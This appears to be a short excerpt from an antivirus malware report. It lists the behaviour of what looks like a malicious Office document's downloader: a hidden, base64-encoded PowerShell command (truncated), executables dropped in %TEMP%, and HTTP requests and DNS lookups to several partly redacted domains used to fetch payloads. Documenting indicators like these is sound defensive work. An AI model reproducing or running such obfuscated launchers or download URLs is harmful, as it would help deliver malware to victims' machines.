Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAG4AeQB3AHIAeQBhAD0AKAAnAEIAbwAnACsAJwBsADEANQBnACcAKwAnAGUAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAHYAOgBUAEUAbQBwAFwATwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\835400.cvr
- %TEMP%\office2019\ijbtr_.exe
- %TEMP%\office2019\ijbtr_.exe
- 'gu###hr24.de':80
- 'za###life.com':80
- 'mi###-seite.de':80
- 'br######acricketleague.com':80
- http://gu###hr24.de/2015-11-09/arnf/
- http://za###life.com/wp-includes/w2jz15807/
- http://mi###-seite.de/bigil/VNgmf9392/
- http://br######acricketleague.com/wp-admin/XgE3ss97089/
- DNS ASK gu###hr24.de
- DNS ASK za###life.com
- DNS ASK mi###-seite.de
- DNS ASK gr###lms.com
- DNS ASK br######acricketleague.com
- DNS ASK be####phukhoa.info
- DNS ASK bl##.###adiworldtech.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAG4AeQB3AHIAeQBhAD0AKAAnAEIAbwAnACsAJwBsADEANQBnACcAKwAnAGUAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAHYAOgBUAEUAbQBwAFwATwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)